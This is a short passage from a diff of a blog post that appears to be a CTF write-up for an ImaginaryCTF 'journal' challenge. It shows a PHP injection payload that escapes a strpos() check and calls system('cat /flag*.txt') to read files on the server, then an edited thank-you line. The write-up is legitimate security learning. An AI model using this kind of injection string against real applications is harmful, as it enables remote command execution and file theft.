ammarbinfaisal/blog/_posts/2024-07-23-writeup-journal-imaginary-ctf.md

 strpos('', '1')or die(system('cat /flag*.txt'))or strpos('e', '..') === false
 ```

-**Thanks to the organizers for the challenge I really enjoyed the ctf for the few hours I played and loved this challenge.**
+**Thanks to the organizers for the challenge I really enjoyed the ctf, especially this challenges.**